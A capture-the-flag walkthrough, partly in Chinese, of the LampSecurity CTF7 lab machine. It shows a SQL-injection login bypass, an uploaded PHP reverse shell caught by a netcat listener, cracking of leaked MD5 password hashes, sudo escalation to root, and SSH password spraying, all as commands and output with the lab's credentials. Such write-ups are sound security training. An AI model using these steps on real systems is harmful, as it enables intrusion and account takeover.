[vulnhub] LampSec-CTF7

First Post:

Last Update:

Word Count:
4.2k

Read Time:
24 min

431ef4c15c924ca9deb0561a86d7d35034144840

靶机部署

这台机子将其网卡设置为eth0。实际上的网卡是eth1。因此,我们需要删除配置文件/etc/sysconfig/network-scripts/ifcfg-eth0,并创建一个名为ifcfg-eth1的新文件。必须写在文件中的设置是ONBOOT=yes BOOTPROTO=dhcp DEVICE=eth1 #要配置的网卡名。然后service network restart就可以了。(在Cent OS 6中, 在大于等于7的版本应该使用systemctl)
其实之后最好把靶机丢到vm里面选择已经移动别选复制,这样容易保障网络环境配置不出问题。

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:29 CST
Nmap scan report for 192.168.56.1
Host is up (0.0014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.0010s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.141
Host is up (0.00089s latency).
MAC Address: 00:0C:29:AC:12:E4 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00060s latency).
MAC Address: 00:50:56:E6:06:A3 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.02 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:30 CST
Nmap scan report for 192.168.56.141
Host is up (0.0011s latency).
Not shown: 65507 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:AC:12:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

还开了挺多端口的,80,8080,139,10000都可以看看。

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -sU -p- --min-rate=10000 192.168.56.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:39 CST
Warning: 192.168.56.141 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.141
Host is up (0.0019s latency).
All 65535 scanned ports on 192.168.56.141 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:AC:12:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.81 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.56.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 20:47 CST
Nmap scan report for 192.168.56.141
Host is up (0.00058s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:AC:12:E4 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.12 seconds

趁其它还在扫描的时间先看看80端口吧。

EXPLOIT

web

先目录发现一下,扫描的同时自己手动看看网页。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo dirb http://192.168.56.141                                                                                
[sudo] password for kali: 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May  2 22:34:27 2023
URL_BASE: http://192.168.56.141/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

随便点点,发现有几个可以输入注册的地方,以及8080端口是个登录页面。
sqli-1.png
sqli-2
sqli-login.png

SQLi

加点'看看有何反应。
sqli-1-re.png
sqli-2-re.png
OK,存在sql注入漏洞。之后看看是否用sqlmap把库dump出来看看。
再在登录页面试试。

1
2
3
# 192.168.56.141:8080
admin
') or 1=1 #-- -

竟然直接登进来了。

文件上传

ok,不过一时间看不出是什么cms,那就找找有无什么可以上传文件的地方呗。
image.png

幸运的是我们找到了可以传文件的地方
image.png

我们尝试利用文件上传
filter.png

Seems that the <?and?> are filtered. However, even if we try to bypass the filter like <sript language="php">payload</script>, the payload just doesn’t work.

As a result, we must find the path of the uploaded shell.

Oh, don’t forget we did web content discovery and it was done for sure. So let us take a look at it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo dirb http://192.168.56.141                                                                                
[sudo] password for kali: 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May  2 22:34:27 2023
URL_BASE: http://192.168.56.141/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.141/ ----
+ http://192.168.56.141/about (CODE:200|SIZE:4910)                                                                          
==> DIRECTORY: http://192.168.56.141/assets/                                                                                
+ http://192.168.56.141/backups (CODE:301|SIZE:333)                                                                         
+ http://192.168.56.141/cgi-bin/ (CODE:403|SIZE:290)                                                                        
+ http://192.168.56.141/contact (CODE:200|SIZE:5017)                                                                        
==> DIRECTORY: http://192.168.56.141/css/                                                                                   
+ http://192.168.56.141/db (CODE:200|SIZE:3904)                                                                             
+ http://192.168.56.141/default (CODE:200|SIZE:6058)                                                                        
+ http://192.168.56.141/footer (CODE:200|SIZE:3904)                                                                         
+ http://192.168.56.141/header (CODE:200|SIZE:3904)                                                                         
==> DIRECTORY: http://192.168.56.141/img/                                                                                   
==> DIRECTORY: http://192.168.56.141/inc/                                                                                   
+ http://192.168.56.141/index.php (CODE:200|SIZE:6058)                                                                      
==> DIRECTORY: http://192.168.56.141/js/                                                                                    
+ http://192.168.56.141/newsletter (CODE:200|SIZE:4037)                                                                     
+ http://192.168.56.141/phpinfo (CODE:200|SIZE:58762)                                                                       
+ http://192.168.56.141/profile (CODE:200|SIZE:3977)                                                                        
+ http://192.168.56.141/read (CODE:302|SIZE:1)                                                                              
+ http://192.168.56.141/recovery (CODE:200|SIZE:4807)                                                                       
+ http://192.168.56.141/register (CODE:200|SIZE:6591)                                                                       
+ http://192.168.56.141/signup (CODE:200|SIZE:4783)                                                                         
+ http://192.168.56.141/usage (CODE:403|SIZE:287)                                                                           
==> DIRECTORY: http://192.168.56.141/webalizer/                                                                             
==> DIRECTORY: http://192.168.56.141/webmail/                                                                               
                                                                                                                            
---- Entering directory: http://192.168.56.141/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.141/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.141/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.141/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.141/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.141/webalizer/ ----
+ http://192.168.56.141/webalizer/index.html (CODE:200|SIZE:3671)                                                           
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/ ----
+ http://192.168.56.141/webmail/bin (CODE:403|SIZE:293)                                                                     
+ http://192.168.56.141/webmail/config (CODE:403|SIZE:296)                                                                  
+ http://192.168.56.141/webmail/favicon.ico (CODE:200|SIZE:1150)                                                            
+ http://192.168.56.141/webmail/index.php (CODE:200|SIZE:5157)                                                              
==> DIRECTORY: http://192.168.56.141/webmail/installer/                                                                     
+ http://192.168.56.141/webmail/LICENSE (CODE:403|SIZE:297)                                                                 
+ http://192.168.56.141/webmail/logs (CODE:403|SIZE:294)                                                                    
==> DIRECTORY: http://192.168.56.141/webmail/plugins/                                                                       
==> DIRECTORY: http://192.168.56.141/webmail/program/                                                                       
+ http://192.168.56.141/webmail/README (CODE:403|SIZE:296)                                                                  
+ http://192.168.56.141/webmail/robots.txt (CODE:200|SIZE:26)                                                               
==> DIRECTORY: http://192.168.56.141/webmail/skins/                                                                         
+ http://192.168.56.141/webmail/SQL (CODE:403|SIZE:293)                                                                     
+ http://192.168.56.141/webmail/temp (CODE:403|SIZE:294)                                                                    
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/installer/ ----
==> DIRECTORY: http://192.168.56.141/webmail/installer/images/                                                              
+ http://192.168.56.141/webmail/installer/index.php (CODE:302|SIZE:0)                                                       
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/archive/                                                               
==> DIRECTORY: http://192.168.56.141/webmail/plugins/emoticons/                                                             
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/                                                                  
==> DIRECTORY: http://192.168.56.141/webmail/plugins/password/                                                              
==> DIRECTORY: http://192.168.56.141/webmail/plugins/userinfo/                                                              
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.                                                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/                                                                 
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/installer/images/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/archive/skins/                                                         
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/emoticons/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/content/                                                          
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/skins/                                                            
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/password/drivers/                                                      
==> DIRECTORY: http://192.168.56.141/webmail/plugins/password/helpers/                                                      
+ http://192.168.56.141/webmail/plugins/password/README (CODE:200|SIZE:10645)                                               
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/userinfo/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/                                                          
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/includes/                                                        
+ http://192.168.56.141/webmail/skins/classic/README (CODE:200|SIZE:855)                                                    
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/templates/                                                       
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/archive/skins/classic/                                                 
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/help/content/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/skins/classic/                                                    
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/password/drivers/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/password/helpers/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/buttons/                                                  
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/display/                                                  
+ http://192.168.56.141/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)                                       
==> DIRECTORY: http://192.168.56.141/webmail/skins/classic/images/icons/                                                    
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/includes/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/templates/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/archive/skins/classic/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.56.141/webmail/plugins/help/skins/classic/templates/                                          
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/buttons/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/display/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/skins/classic/images/icons/ ----
                                                                                                                            
---- Entering directory: http://192.168.56.141/webmail/plugins/help/skins/classic/templates/ ----
                                                                               /zt                                          
-----------------
END_TIME: Tue May  2 22:39:31 2023
DOWNLOADED: 124624 - FOUND: 32

After some munal try, we find out upload file in the path of 192.168.56.141/assets/.
So we upload php-reverse-shell.
image.pngAnd we curl our shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# curl http://192.168.56.141/assets/shell.php
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo nc -lvp 443                                                           
[sudo] password for kali: 
listening on [any] 443 ...
192.168.56.141: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.141] 48031
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
 17:37:14 up  2:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.1$ whoami
whoami
apache
sh-4.1$ pwd
/
pwd
sh-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:ac:12:e4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.141/24 brd 192.168.56.255 scope global eth1
    inet6 fe80::20c:29ff:feac:12e4/64 scope link 
       valid_lft forever preferred_lft forever

Sucessfully get webshell.

Privilege Escalation

先python spwan一个更稳定的shell。
然后sudo -l需要密码,findsuid位文件没有能用的,cat /etc/crontab直接没有定时任务。OK。
行吧,在上大招前先手工枚举一下吧。

1
2
uname -a                                                                                     
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux

版本挺低的,还是经典2.6,可以考虑内核提权。但是优先级往后稍稍吧。

配置文件查看

cd到/home目录下,发现很多用户,然而没有read权限,没用,查不了是否有用户遗留的登录凭证。
那就看看网站配置文件啥的吧,找点前后端连接用到的密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
bash-4.1$ cat config.inc.php
cat config.inc.php
<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.5.4 setup script
 * Date: Wed, 19 Dec 2012 09:01:38 -0500
 */

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['nopassword'] = true;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
$cfg['Servers'][$i]['AllowNoPasswordRoot'] = TRUE; 

/* End of servers configuration */

$cfg['blowfish_secret'] = '50d1c8ba084fd9.39888691';
$cfg['DefaultLang'] = 'en';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';

从网站config文件我们可以看到,数据root用户登录直接不用密码。那我之后可以登录一下数据库找点信息。

敏感信息泄露

再手动遍历了下网页目录,发现之前进不去的/backups目录有个备份文件。我们查看一下,刚好最后几行记录了向数据库插入用户的账号密码等信息。

1
2
3
4
5
/* /var/www/html/backups */
LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES ('webdev@localhost.localdomain','f7aa6066f95255096672e3a5fc537081',1,NULL,13,'Developer account','Developer account for updating the site.'),('brian@localhost.localdomain','d41d8cd98f00b204e9800998ecf8427e',1,'2012-12-19 11:30:54',3,'Brian Hershel','Brian is our technical brains behind the operations and a chief trainer.'),('john@localhost.localdomain','0d9ff2a4396d6939f80ffe09b1280ee1',1,NULL,4,'John Durham',''),('alice@localhost.localdomain','2146bf95e8929874fc63d54f50f1d2e3',1,NULL,5,'Alice Wonder',''),('ruby@localhost.localdomain','9f80ec37f8313728ef3e2f218c79aa23',0,NULL,6,'Ruby Spinster',''),('leon@localhost.localdomain','5d93ceb70e2bf5daa84ec3d0cd2c731a',0,NULL,7,'Leon Parnetta',''),('julia@localhost.localdomain','ed2539fe892d2c52c42a440354e8e3d5',0,NULL,8,'Julia Fields',''),('michael@localhost.localdomain','9c42a1346e333a770904b2a2b37fa7d3',0,NULL,9,'Michael Saint',''),('bruce@localhost.localdomain','3a24d81c2b9d0d9aaf2f10c6c9757d4e',0,NULL,10,'Bruce Pottricks',''),('neil@localhost.localdomain','4773408d5358875b3764db552a29ca61',0,NULL,11,'Neil Felstein',''),('charles@localhost.localdomain','b2a97bcecbd9336b98d59d9324dae5cf',0,NULL,12,'Charles Adams','');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;

我们提取一下登录凭证,把哈希值丢到crackstation。然后用得到的密码尝试直接ssh看看能不能成功登录。

1
2
3
brain:''#竟然是md5的空值,草。
webdev:'webdev'
john:'transformersrule'

试到第3个john的时候就成功了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
bash-4.1$ su john
su john
Password: transformersrule

[john@localhost backups]$ whoami
whoami
john
[john@localhost backups]$ sudo -l
sudo -l
[sudo] password for john: transformersrule

Matching Defaults entries for john on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User john may run the following commands on this host:
    (ALL) ALL
[john@localhost backups]$ sudo su
sudo su
[root@localhost backups]# whoami
whoami
root
[root@localhost backups]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:ac:12:e4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.141/24 brd 192.168.56.255 scope global eth1
    inet6 fe80::20c:29ff:feac:12e4/64 scope link 
       valid_lft forever preferred_lft forever

直接是sudo用户组的,直接提权成功。

密码复用

当然,我们也可以登录mysql数据库查看用户与密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#mysql -uroot
#show databases;
#use users;
#select * from users;
mysql> select username,password from users;
select username,password from users;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| 1@1.com                       | c4ca4238a0b923820dcc509a6f75849b |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
13 rows in set (0.00 sec)

将这些凭证用sedawk处理后,将hash值直接丢到hashcat中破解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ hashcat -a 0 -m 0 passhash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz, 2913/5890 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs

ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents                 
Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: passhash
Time.Started.....: Wed May  3 14:34:10 2023 (6 secs)
Time.Estimated...: Wed May  3 14:34:16 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2728.7 kH/s (0.22ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 28%

Started: Wed May  3 14:33:41 2023
Stopped: Wed May  3 14:34:17 2023

我们用这些凭证进行密码喷洒攻击。

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf7/workSpace]
└─$ sudo crackmapexec ssh 192.168.56.141 -u username -p pass --continue-on-success | grep +
SSH         192.168.56.141  22     192.168.56.141   [+] brian:my2cents 
SSH         192.168.56.141  22     192.168.56.141   [+] alice:turtles77 
SSH         192.168.56.141  22     192.168.56.141   [+] leon:qwer1234 
SSH         192.168.56.141  22     192.168.56.141   [+] julia:madrid 
SSH         192.168.56.141  22     192.168.56.141   [+] michael:somepassword 
SSH         192.168.56.141  22     192.168.56.141   [+] charles:chuck33

非常OK。